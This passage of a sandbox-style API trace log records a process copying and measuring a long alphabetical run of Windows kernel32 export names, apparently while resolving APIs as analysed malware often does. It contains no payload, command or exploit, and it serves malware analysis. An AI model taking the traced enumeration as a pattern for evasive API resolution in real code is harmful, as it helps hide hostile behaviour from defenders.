lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.843] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.843] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.844] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.844] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.844] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.844] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.844] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.844] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.844] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.844] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.844] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.844] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.844] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.844] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.844] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.844] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.844] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.844] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.844] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.844] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.844] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.844] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.845] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.845] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.845] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.845] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.845] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.845] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.845] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.845] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.845] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.845] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.845] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.845] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.845] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.845] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.845] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.845] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.845] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.845] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.845] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.846] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.846] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.846] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.846] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.846] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.846] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.846] lstrlenA (lpString="COPYFILEA") returned 9 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.846] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.846] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.846] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.846] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.846] lstrlenA (lpString="COPYFILEW") returned 9 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.846] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.846] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.846] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.846] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.846] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.846] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.846] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.846] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.846] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.847] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.847] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.847] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.847] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.847] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.847] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.847] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.847] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.847] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.847] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.847] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.847] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.847] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.847] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.847] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.847] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.847] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.847] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.848] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.848] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.848] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.848] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.848] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.848] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.848] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.848] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.848] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.848] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.848] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.848] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.848] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.848] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.848] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.848] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.848] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.848] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.848] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.849] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.849] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.849] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.849] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.849] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.849] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.849] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.849] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.849] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.849] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.849] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.849] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.849] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.849] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.849] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.849] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.849] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.849] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.849] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.849] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.850] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.850] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.850] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.850] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.850] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.850] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.850] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.850] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.850] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.850] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.850] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.850] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.850] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.850] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.850] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.850] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.850] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.850] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.850] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.850] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0178.850] 